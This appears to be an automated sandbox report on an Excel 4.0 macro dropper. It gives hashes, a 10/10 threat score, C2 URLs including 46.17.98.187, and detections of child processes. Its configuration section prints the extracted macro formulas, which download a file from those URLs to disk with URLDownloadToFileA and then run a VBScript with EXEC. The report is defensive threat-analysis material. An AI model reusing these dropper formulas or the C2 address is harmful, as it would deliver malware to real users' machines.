General

  • Target

    07dedafd0fe71a813713ff615bae1f48

  • Size

    6KB

  • Sample

    231221-1q8qwshggk

  • MD5

    07dedafd0fe71a813713ff615bae1f48

  • SHA1

    7e3cca6c59a38c5d50d28bfaf02f45feae37260b

  • SHA256

    0da5b46bf686558b3967dae7ffa2e6eb7795810815a0b155805716d771052140

  • SHA512

    761a50ff2b17a2c2618589530d0b0f73ef442ff3b8160b69401b36eb636a501e44d2502913a4ac41491856c6b4ce8d6d02a4b1c880edc4595d5d2fb7fda7417e

  • SSDEEP

    192:NDSJuSXbrA2OmmfRa8UhHFBFYuEb98ypkPk9z+3:NiuEM2wc1FY9b98ypkPk9M

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      07dedafd0fe71a813713ff615bae1f48

    • Size

      6KB

    • MD5

      07dedafd0fe71a813713ff615bae1f48

    • SHA1

      7e3cca6c59a38c5d50d28bfaf02f45feae37260b

    • SHA256

      0da5b46bf686558b3967dae7ffa2e6eb7795810815a0b155805716d771052140

    • SHA512

      761a50ff2b17a2c2618589530d0b0f73ef442ff3b8160b69401b36eb636a501e44d2502913a4ac41491856c6b4ce8d6d02a4b1c880edc4595d5d2fb7fda7417e

    • SSDEEP

      192:NDSJuSXbrA2OmmfRa8UhHFBFYuEb98ypkPk9z+3:NiuEM2wc1FY9b98ypkPk9M

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks